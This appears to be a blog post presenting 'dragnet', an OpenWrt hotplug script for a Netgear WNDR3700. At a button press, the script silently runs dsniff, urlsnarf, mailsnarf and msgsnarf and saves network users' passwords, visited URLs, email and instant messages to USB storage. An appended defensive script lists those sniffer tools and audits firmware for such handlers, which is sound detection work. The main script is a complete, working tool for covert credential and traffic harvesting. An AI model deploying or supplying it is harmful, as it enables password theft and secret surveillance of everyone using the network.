I was looking at an old Netgear router firmware I have here, the WGR614v7, and I noticed there was a log kept of which websites had been visited that could be accessed in the web administration. I wanted to see how difficult it would be to duplicate that function for my WNDR3700 OpenWRT build using dsniff. It turns out it is trivial, and the script I came up with does even more.

1. Takes variables for the mountpoint of your USB storage and the network or interface you wish to monitor.
2. Is activated when the WPS button is pressed so long as the USB storage is mounted and the network interface specified exists (you can also use bridged interfaces such as br-lan).
3. When the WPS button is pressed the power LED goes out and a directory called dragnet is created on the root of your USB storage. Inside there are 4 files: passwords, url, mail, messages.
4. If the WPS button is pressed again the unit reboots.

Passwords for numerous protocols, any URL visited, email (POP, SMTP or IMAP) and instant messages are recorded respectively. SSL-protected communications are not harvested in this version.

So there it is, at the touch of a button. But please do not use this to invade people's privacy. It's a proof of concept for those wanting to see how such a system might work. As for the performance penalty: hardly noticeable for web pages, significant for HTTP downloads, and nonexistent for torrents.


The dsniff package must be installed for this to operate.

/etc/hotplug.d/button/50-dragnet

#!/bin/sh

# Interface (or bridge) to monitor and mountpoint of the USB storage
TARGET=br-iwn
MNT_POINT=/usb

if [ "$BUTTON" = "BTN_1" ] && [ "$ACTION" = "pressed" ]; then
    if [ -e /tmp/dragnet ]; then
        # Second press: capture is already running, so reboot to stop it
        logger "dragnet down, rebooting"
        reboot
    else
        # First press: require mounted USB storage and an existing interface
        if [ "$(mount | grep -c "on $MNT_POINT")" = 0 ] || [ "$(ifconfig | grep -c "$TARGET")" = 0 ]; then
            logger "unable to activate dragnet because USB storage device is not mounted and/or target network is unavailable"
        else
            # dragnet action here
            logger "dragnet activated on $TARGET"
            echo "$TARGET" > /tmp/dragnet
            # Turn the power LED off to show that capture is active
            echo "0" > /sys/devices/platform/leds-gpio/leds/wndr3700:green:power/brightness
            mkdir -p "$MNT_POINT/dragnet/$TARGET"
            dsniff -i "$TARGET" -m >> "$MNT_POINT/dragnet/$TARGET/passwords" &
            urlsnarf -i "$TARGET" >> "$MNT_POINT/dragnet/$TARGET/url" &
            mailsnarf -i "$TARGET" >> "$MNT_POINT/dragnet/$TARGET/mail" &
            msgsnarf -i "$TARGET" >> "$MNT_POINT/dragnet/$TARGET/message" &
        fi
    fi
fi
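
The other side of this, as an added example that is not part of the original script: a check an administrator can run on a router (or on an unpacked firmware image) to spot a button handler like the one above. It looks for hotplug scripts that launch dsniff-suite tools and for the /tmp/dragnet marker; the `audit_hotplug` and `make_sample_root` names and the sample tree are constructed for illustration.

```sh
#!/bin/sh
# Added example (not the post's code): audit an OpenWrt root for hotplug
# handlers that launch dsniff-suite tools, plus the /tmp/dragnet state marker.
SNIFFERS='dsniff|urlsnarf|mailsnarf|msgsnarf'

# audit_hotplug [ROOT]: ROOT is "" for the live system or the path of an
# unpacked firmware image. Prints one FINDING line per hit; returns 1 if any.
audit_hotplug() {
    root="${1:-}"
    found=0
    for f in "$root"/etc/hotplug.d/*/*; do
        [ -f "$f" ] || continue
        # Drop comment lines, then collect sniffer names used as whole words.
        hits=$(grep -v '^[[:space:]]*#' "$f" | grep -Eow "$SNIFFERS" | sort -u | tr '\n' ' ')
        if [ -n "$hits" ]; then
            rel=${f#"$root"}
            echo "FINDING $rel: launches ${hits% }"
            found=1
        fi
    done
    if [ -e "$root/tmp/dragnet" ]; then
        echo "FINDING /tmp/dragnet: capture marker present"
        found=1
    fi
    return "$found"
}

# Constructed sample tree (hypothetical helper) so the audit runs offline.
make_sample_root() {
    d=$(mktemp -d)
    mkdir -p "$d/etc/hotplug.d/button" "$d/tmp"
    printf '%s\n' '#!/bin/sh' '# dsniff is mentioned only in this comment' \
        'logger "button $BUTTON $ACTION"' > "$d/etc/hotplug.d/button/10-benign"
    printf '%s\n' '#!/bin/sh' 'dsniff -i br-lan -m >> /usb/p &' \
        'urlsnarf -i br-lan >> /usb/u &' 'mailsnarf -i br-lan >> /usb/m &' \
        'msgsnarf -i br-lan >> /usb/i &' > "$d/etc/hotplug.d/button/50-dragnet"
    echo br-lan > "$d/tmp/dragnet"
    echo "$d"
}

sample=$(make_sample_root)
audit_hotplug "$sample" || echo "review the handlers listed above"
rm -rf "$sample"
```

On a live router, call `audit_hotplug` with no argument so it reads /etc/hotplug.d and /tmp directly.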